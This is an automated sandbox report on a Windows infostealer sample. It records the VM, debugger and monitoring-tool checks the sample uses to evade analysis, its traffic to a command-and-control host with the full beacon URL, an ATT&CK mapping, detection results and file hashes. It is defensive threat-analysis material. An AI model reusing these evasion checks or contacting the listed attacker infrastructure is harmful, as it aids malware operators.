Source: 5ZH9uXmzGP.exe, 00000001.00000002.2413981644.000000000071D000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: SYSTEM\ControlSet001\Services\VBoxSF
Source: Amcache.hve.5.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.5.drBinary or memory string: vmci.syshbin`
Source: Amcache.hve.5.drBinary or memory string: \driver\vmci,\driver\pci
Source: 5ZH9uXmzGP.exe, 00000001.00000002.2415220079.000000000142B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllm
Source: Amcache.hve.5.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.5.drBinary or memory string: VMware20,1
Source: Amcache.hve.5.drBinary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.5.drBinary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.5.drBinary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.5.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.5.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.5.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.5.drBinary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.5.drBinary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.5.drBinary or memory string: VMware Virtual RAM
Source: Amcache.hve.5.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: 5ZH9uXmzGP.exe, 00000001.00000002.2414578137.0000000000A17000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: 5ZH9uXmzGP.exe, 00000001.00000003.2263569783.00000000067B1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Y\MACHINE\SYSTEM\ControlSet001\Services\VBoxSFlM!
Source: Amcache.hve.5.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeSystem information queried: ModuleInformationJump to behavior
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeProcess information queried: ProcessInformationJump to behavior

Anti Debugging

barindex
Hides threads from debuggers
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeThread information set: HideFromDebuggerJump to behavior
Tries to detect sandboxes and other dynamic analysis tools (window names)
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeOpen window title or class name: regmonclass
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeOpen window title or class name: gbdyllo
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeOpen window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeOpen window title or class name: ollydbg
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeOpen window title or class name: filemonclass
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeFile opened: NTICE
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeFile opened: SICE
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeFile opened: SIWVID
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeCode function: 1_2_06ED0CA7 rdtsc 1_2_06ED0CA7
Source: 5ZH9uXmzGP.exe, 5ZH9uXmzGP.exe, 00000001.00000002.2414578137.0000000000A17000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: /uProgram Manager
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
Source: 5ZH9uXmzGP.exe, 00000001.00000003.2219046357.0000000007216000.00000004.00001000.00020000.00000000.sdmp, 5ZH9uXmzGP.exe, 00000001.00000002.2413981644.000000000071D000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: procmon.exe
Source: Amcache.hve.5.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.5.drBinary or memory string: msmpeng.exe
Source: 5ZH9uXmzGP.exe, 00000001.00000003.2219046357.0000000007216000.00000004.00001000.00020000.00000000.sdmp, 5ZH9uXmzGP.exe, 00000001.00000002.2413981644.000000000071D000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: wireshark.exe
Source: Amcache.hve.5.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.5.drBinary or memory string: MsMpEng.exe

Stealing of Sensitive Information

barindex
Leaks process information
Source: global trafficTCP traffic: 192.168.2.5:49726 -> 185.121.15.192:80
Source: global trafficTCP traffic: 192.168.2.5:49733 -> 185.121.15.192:80
Source: global trafficTCP traffic: 192.168.2.5:49734 -> 185.121.15.192:80

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
Command and Scripting Interpreter		1
DLL Side-Loading		2
Process Injection		24
Virtualization/Sandbox Evasion		OS Credential Dumping751
Security Software Discovery		Remote Services1
Archive Collected Data		1
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
DLL Side-Loading		2
Process Injection		LSASS Memory24
Virtualization/Sandbox Evasion		Remote Desktop ProtocolData from Removable Media1
Ingress Tool Transfer		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
Obfuscated Files or Information		Security Account Manager12
Process Discovery		SMB/Windows Admin SharesData from Network Shared Drive3
Non-Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook12
Software Packing		NTDS1
Remote System Discovery		Distributed Component Object ModelInput Capture4
Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
DLL Side-Loading		LSA Secrets214
System Information Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
5ZH9uXmzGP.exe53%VirustotalBrowse
5ZH9uXmzGP.exe50%ReversingLabsWin32.Infostealer.Tinba
5ZH9uXmzGP.exe100%AviraTR/Crypt.TPM.Gen
5ZH9uXmzGP.exe100%Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
home.fivetk5ht.top
185.121.15.192
truefalse
    		high
    httpbin.org
    		98.85.100.80
    		truefalse
      		high

      Contacted URLs

      NameMaliciousAntivirus DetectionReputation
      http://home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv1734579851false
        		high
        https://httpbin.org/ipfalse
          		high

          URLs from Memory and Binaries

          NameSourceMaliciousAntivirus DetectionReputation
          https://curl.se/docs/hsts.html5ZH9uXmzGP.exe, 00000001.00000002.2413981644.000000000071D000.00000040.00000001.01000000.00000003.sdmpfalse
            		high
            http://html4/loose.dtd5ZH9uXmzGP.exe, 00000001.00000003.2219046357.0000000007216000.00000004.00001000.00020000.00000000.sdmp, 5ZH9uXmzGP.exe, 00000001.00000002.2413981644.000000000071D000.00000040.00000001.01000000.00000003.sdmpfalse
              		high
              http://home.fivetk5ht.top/zldPR5ZH9uXmzGP.exe, 5ZH9uXmzGP.exe, 00000001.00000002.2415220079.0000000001485000.00000004.00000020.00020000.00000000.sdmp, 5ZH9uXmzGP.exe, 00000001.00000003.2319274899.0000000001485000.00000004.00000020.00020000.00000000.sdmpfalse
                		unknown
                http://home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv1734579851http://home.fivetk5ht.top/zldPRFrmVFHTtKntGp5ZH9uXmzGP.exe, 00000001.00000002.2413981644.000000000071D000.00000040.00000001.01000000.00000003.sdmpfalse
                  		high
                  https://httpbin.org/ipbefore5ZH9uXmzGP.exe, 00000001.00000003.2219046357.0000000007216000.00000004.00001000.00020000.00000000.sdmp, 5ZH9uXmzGP.exe, 00000001.00000002.2413981644.000000000071D000.00000040.00000001.01000000.00000003.sdmpfalse
                    		high
                    https://curl.se/docs/http-cookies.html5ZH9uXmzGP.exe, 00000001.00000003.2219046357.0000000007216000.00000004.00001000.00020000.00000000.sdmp, 5ZH9uXmzGP.exe, 00000001.00000002.2413981644.000000000071D000.00000040.00000001.01000000.00000003.sdmpfalse
                      		high
                      http://home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv1734579851z5ZH9uXmzGP.exe, 00000001.00000002.2415220079.00000000013CE000.00000004.00000020.00020000.00000000.sdmpfalse
                        		unknown
                        http://home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv173457985169635ZH9uXmzGP.exe, 00000001.00000002.2415220079.00000000013CE000.00000004.00000020.00020000.00000000.sdmpfalse
                          		unknown
                          http://home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv175ZH9uXmzGP.exe, 00000001.00000002.2413981644.000000000071D000.00000040.00000001.01000000.00000003.sdmpfalse
                            		high
                            http://upx.sf.netAmcache.hve.5.drfalse
                              		high
                              https://curl.se/docs/alt-svc.html5ZH9uXmzGP.exe, 00000001.00000002.2413981644.000000000071D000.00000040.00000001.01000000.00000003.sdmpfalse
                                		high
                                http://.css5ZH9uXmzGP.exe, 00000001.00000003.2219046357.0000000007216000.00000004.00001000.00020000.00000000.sdmp, 5ZH9uXmzGP.exe, 00000001.00000002.2413981644.000000000071D000.00000040.00000001.01000000.00000003.sdmpfalse
                                  		high
                                  http://home.fivetk5ht.top/zldPRE_5ZH9uXmzGP.exe, 00000001.00000002.2415220079.0000000001485000.00000004.00000020.00020000.00000000.sdmp, 5ZH9uXmzGP.exe, 00000001.00000003.2319274899.0000000001485000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		unknown
                                    http://.jpg5ZH9uXmzGP.exe, 00000001.00000003.2219046357.0000000007216000.00000004.00001000.00020000.00000000.sdmp, 5ZH9uXmzGP.exe, 00000001.00000002.2413981644.000000000071D000.00000040.00000001.01000000.00000003.sdmpfalse
                                      		high

                                      World Map of Contacted IPs

                                      • No. of IPs < 25%
                                      • 25% < No. of IPs < 50%
                                      • 50% < No. of IPs < 75%
                                      • 75% < No. of IPs

                                      Public IPs

                                      IPDomainCountryFlagASNASN NameMalicious
                                      185.121.15.192
                                      		home.fivetk5ht.topSpain
                                      		207046REDSERVICIOESfalse
                                      98.85.100.80
                                      		httpbin.orgUnited States
                                      		11351TWC-11351-NORTHEASTUSfalse

                                      General Information

                                      Joe Sandbox version:41.0.0 Charoite
                                      Analysis ID:1578926
                                      Start date and time:2024-12-20 16:43:26 +01:00
                                      Joe Sandbox product:CloudBasic
                                      Overall analysis duration:0h 5m 35s
                                      Hypervisor based Inspection enabled:false
                                      Report type:full
                                      Cookbook file name:default.jbs
                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                      Number of analysed new started processes analysed:7
                                      Number of new started drivers analysed:0
                                      Number of existing processes analysed:0
                                      Number of existing drivers analysed:0
                                      Number of injected processes analysed:0
                                      Technologies:
                                      • HCA enabled
                                      • EGA enabled
                                      • AMSI enabled
                                      Analysis Mode:default
                                      Analysis stop reason:Timeout
                                      Sample name:5ZH9uXmzGP.exe
                                      renamed because original name is a hash value
                                      Original Sample Name:35e2c99a2fed28f4148ef7f4c1431df4.exe
                                      Detection:MAL
                                      Classification:mal100.troj.evad.winEXE@2/5@10/2
                                      EGA Information:
                                      • Successful, ratio: 100%
                                      HCA Information:Failed
                                      Cookbook Comments:
                                      • Found application associated with file extension: .exe

                                      Warnings

                                      • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                      • Excluded IPs from analysis (whitelisted): 52.168.117.173, 40.126.53.6, 13.107.246.63, 4.245.163.56
                                      • Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, client.wns.windows.com, ocsp.digicert.com, login.live.com, otelrules.azureedge.net, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                      • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                      Simulations

                                      Behavior and APIs

                                      TimeTypeDescription
                                      10:44:45API Interceptor3x Sleep call for process: 5ZH9uXmzGP.exe modified
                                      10:44:56API Interceptor1x Sleep call for process: WerFault.exe modified

                                      Joe Sandbox View / Context

                                      IPs

                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      185.121.15.1922M43DSi2cx.exeGet hashmaliciousUnknownBrowse
                                      • home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv1734579851
                                      HZhObFuFNe.exeGet hashmaliciousUnknownBrowse
                                      • home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv1734579851
                                      t6VDbnvGeN.exeGet hashmaliciousUnknownBrowse
                                      • home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv1734579851
                                      16ebsersuX.exeGet hashmaliciousCryptbotBrowse
                                      • home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850
                                      hUhhrsyGtz.exeGet hashmaliciousCryptbotBrowse
                                      • home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv1734579851
                                      pCElIX19tu.exeGet hashmaliciousUnknownBrowse
                                      • home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv1734579851
                                      CMpuGis28l.exeGet hashmaliciousUnknownBrowse
                                      • home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv1734579851
                                      5Jat5RkD3a.exeGet hashmaliciousUnknownBrowse
                                      • home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850
                                      u57m8aCdwb.exeGet hashmaliciousUnknownBrowse
                                      • home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850
                                      TnIhoWAr57.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                      • home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850
                                      98.85.100.80u16wYpJpGE.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                        HZhObFuFNe.exeGet hashmaliciousUnknownBrowse
                                          t6VDbnvGeN.exeGet hashmaliciousUnknownBrowse
                                            CMpuGis28l.exeGet hashmaliciousUnknownBrowse
                                              u57m8aCdwb.exeGet hashmaliciousUnknownBrowse
                                                TnIhoWAr57.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                  file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, zgRATBrowse
                                                    file.exeGet hashmaliciousLummaC, Amadey, LummaC StealerBrowse
                                                      file.exeGet hashmaliciousScreenConnect Tool, LummaC, Amadey, Cryptbot, LummaC Stealer, VidarBrowse
                                                        Tii6ue74NB.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, RHADAMANTHYS, Stealc, VidarBrowse

                                                          Domains

                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          home.fivetk5ht.top2M43DSi2cx.exeGet hashmaliciousUnknownBrowse
                                                          • 185.121.15.192
                                                          HZhObFuFNe.exeGet hashmaliciousUnknownBrowse
                                                          • 185.121.15.192
                                                          t6VDbnvGeN.exeGet hashmaliciousUnknownBrowse
                                                          • 185.121.15.192
                                                          hUhhrsyGtz.exeGet hashmaliciousCryptbotBrowse
                                                          • 185.121.15.192
                                                          pCElIX19tu.exeGet hashmaliciousUnknownBrowse
                                                          • 185.121.15.192
                                                          CMpuGis28l.exeGet hashmaliciousUnknownBrowse
                                                          • 185.121.15.192
                                                          file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, zgRATBrowse
                                                          • 185.121.15.192
                                                          file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, zgRATBrowse
                                                          • 185.121.15.192
                                                          httpbin.org2M43DSi2cx.exeGet hashmaliciousUnknownBrowse
                                                          • 34.226.108.155
                                                          f9bcOz8SxR.exeGet hashmaliciousUnknownBrowse
                                                          • 34.226.108.155
                                                          u16wYpJpGE.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                          • 98.85.100.80
                                                          1o81tDUu5M.exeGet hashmaliciousUnknownBrowse
                                                          • 34.226.108.155
                                                          HZhObFuFNe.exeGet hashmaliciousUnknownBrowse
                                                          • 98.85.100.80
                                                          t6VDbnvGeN.exeGet hashmaliciousUnknownBrowse
                                                          • 98.85.100.80
                                                          16ebsersuX.exeGet hashmaliciousCryptbotBrowse
                                                          • 34.226.108.155
                                                          hUhhrsyGtz.exeGet hashmaliciousCryptbotBrowse
                                                          • 34.226.108.155
                                                          pCElIX19tu.exeGet hashmaliciousUnknownBrowse
                                                          • 34.226.108.155
                                                          CMpuGis28l.exeGet hashmaliciousUnknownBrowse
                                                          • 98.85.100.80

                                                          ASNs

                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          TWC-11351-NORTHEASTUSu16wYpJpGE.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                          • 98.85.100.80
                                                          HZhObFuFNe.exeGet hashmaliciousUnknownBrowse
                                                          • 98.85.100.80
                                                          t6VDbnvGeN.exeGet hashmaliciousUnknownBrowse
                                                          • 98.85.100.80
                                                          CMpuGis28l.exeGet hashmaliciousUnknownBrowse
                                                          • 98.85.100.80
                                                          u57m8aCdwb.exeGet hashmaliciousUnknownBrowse
                                                          • 98.85.100.80
                                                          TnIhoWAr57.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                          • 98.85.100.80
                                                          arm5.elfGet hashmaliciousMiraiBrowse
                                                          • 72.226.210.219
                                                          hmips.elfGet hashmaliciousMiraiBrowse
                                                          • 45.46.119.24
                                                          file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, zgRATBrowse
                                                          • 98.85.100.80
                                                          file.exeGet hashmaliciousLummaC, Amadey, LummaC StealerBrowse
                                                          • 98.85.100.80
                                                          REDSERVICIOES2M43DSi2cx.exeGet hashmaliciousUnknownBrowse
                                                          • 185.121.15.192
                                                          HZhObFuFNe.exeGet hashmaliciousUnknownBrowse
                                                          • 185.121.15.192
                                                          t6VDbnvGeN.exeGet hashmaliciousUnknownBrowse
                                                          • 185.121.15.192
                                                          16ebsersuX.exeGet hashmaliciousCryptbotBrowse
                                                          • 185.121.15.192
                                                          hUhhrsyGtz.exeGet hashmaliciousCryptbotBrowse
                                                          • 185.121.15.192
                                                          pCElIX19tu.exeGet hashmaliciousUnknownBrowse
                                                          • 185.121.15.192
                                                          CMpuGis28l.exeGet hashmaliciousUnknownBrowse
                                                          • 185.121.15.192
                                                          5Jat5RkD3a.exeGet hashmaliciousUnknownBrowse
                                                          • 185.121.15.192
                                                          u57m8aCdwb.exeGet hashmaliciousUnknownBrowse
                                                          • 185.121.15.192
                                                          TnIhoWAr57.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                          • 185.121.15.192

                                                          JA3 Fingerprints

                                                          No context

                                                          Dropped Files

                                                          No context

                                                          Created / dropped Files

                                                          C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_5ZH9uXmzGP.exe_c83ded59b43169db65e114ac4a6af7c1a42b6b_5e6c7e64_ce33205f-019c-4e5b-aecc-c55c5a5c0d3e\Report.wer

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):65536
                                                          Entropy (8bit):0.9438708942187108
                                                          Encrypted:false
                                                          SSDEEP:96:BTsFhAtAxsGhIGhpJfZQXIDcQvc6QcEVcw3cE/3+HbHg/8BRTf3Oy1oVazW0dPtZ:C7dx60BU/Qju0ZrPMtwzuiFSZ24IO8L
                                                          MD5:3A7AE20591788911A34CF12EF163382C
                                                          SHA1:B4535E823CB6AB08788F5117E386EF54144FA8FE
                                                          SHA-256:A539B71FC8FE631ED04208506538265461AD5B713CF9CE03A77F0C3AB45B86BE
                                                          SHA-512:8F2DBC2687F3DDA8E851846B1E735EA0EE2D057E8CF473D6B1496F1DA58E641879D28528F73C5805A79E7399621496A6202393E3AE87F00C7A124C8B0633749A
                                                          Malicious:true
                                                          Reputation:low
                                                          Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.9.1.8.3.0.9.1.0.0.2.7.6.4.4.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.9.1.8.3.0.9.1.6.1.2.1.5.5.5.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.e.3.3.2.0.5.f.-.0.1.9.c.-.4.e.5.b.-.a.e.c.c.-.c.5.5.c.5.a.5.c.0.d.3.e.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.f.4.e.b.5.4.2.-.b.a.8.7.-.4.f.0.a.-.b.6.6.d.-.f.2.e.b.f.8.4.e.a.d.4.f.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.5.Z.H.9.u.X.m.z.G.P...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.c.4.c.-.0.0.0.1.-.0.0.1.4.-.7.8.8.c.-.5.6.1.2.f.6.5.2.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.b.0.8.b.6.2.9.a.e.1.4.7.5.2.9.0.b.b.8.4.4.4.7.d.5.1.2.3.a.2.5.0.0.0.0.0.f.f.f.f.!.0.0.0.0.8.b.0.5.a.a.4.7.0.9.f.d.0.9.8.9.2.2.3.8.b.a.a.7.a.1.4.f.4.2.d.5.8.d.d.5.8.d.1.4.!.5.Z.H.9.u.X.m.z.G.P...e.x.e.....T.a.r.g.e.t.A.p.p.

                                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WER9650.tmp.dmp

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                          File Type:Mini DuMP crash report, 15 streams, Fri Dec 20 15:44:51 2024, 0x1205a4 type
                                                          Category:dropped
                                                          Size (bytes):214932
                                                          Entropy (8bit):1.4160347153621256
                                                          Encrypted:false
                                                          SSDEEP:384:GaSv3CEqLC7YSzDQKgoTIr/8ApekF3spudfOtGSaIuP4fgN7uUqGq8U:5SvyEqLnKDQKgoErhou8OmgqGN
                                                          MD5:5196FF78088411E0615E89641137CEB3
                                                          SHA1:5D4C84F99ED9A51216531E77EEBAEC8ECC9F9ADC
                                                          SHA-256:F74722EC0AE78EE5CFBB30177BB46461232DCD8A4BFC6A4029F347A3B52DB2B6
                                                          SHA-512:6380DB6F1A95F7993C1A9D79A69025A6B73A7D0F25DF73D1C3D02E8CCD51F95C178B5B93A8A3D340353D063D18F89AC1E35EF51836FC8F4464A2957CA3F4EBB6
                                                          Malicious:false
                                                          Reputation:low
                                                          Preview:MDMP..a..... ........eg............t...........D................ ...........}..........`.......8...........T............,..............P!..........<#..............................................................................eJ.......#......GenuineIntel............T.......L....eg.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WER976A.tmp.WERInternalMetadata.xml

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                          File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):8356
                                                          Entropy (8bit):3.703365744207873
                                                          Encrypted:false
                                                          SSDEEP:192:R6l7wVeJcF6cl36YEIRSU9m9gmfibSprL89b3ysfau9m:R6lXJm6O6YEOSU9m9gmfibz3xfaV
                                                          MD5:553FAAAC8C9B62A0E949FF4E29304D79
                                                          SHA1:AB8EF235D30A15E73A419ADC1898EEE744EADEC9
                                                          SHA-256:6F9B794A8618FA45EA531129F2DFF541F284160A788BDB9CE3BE5A321ED68E27
                                                          SHA-512:C9C6812733329633A5DE7EE4DA5BF0CB54C6BEEF4DB19071FFA7C7FED22E4A9830CF509D8B923AB4B52A95A0DFE6345D04212C82D14E3AC963727CA086EA4CFA
                                                          Malicious:false
                                                          Reputation:low
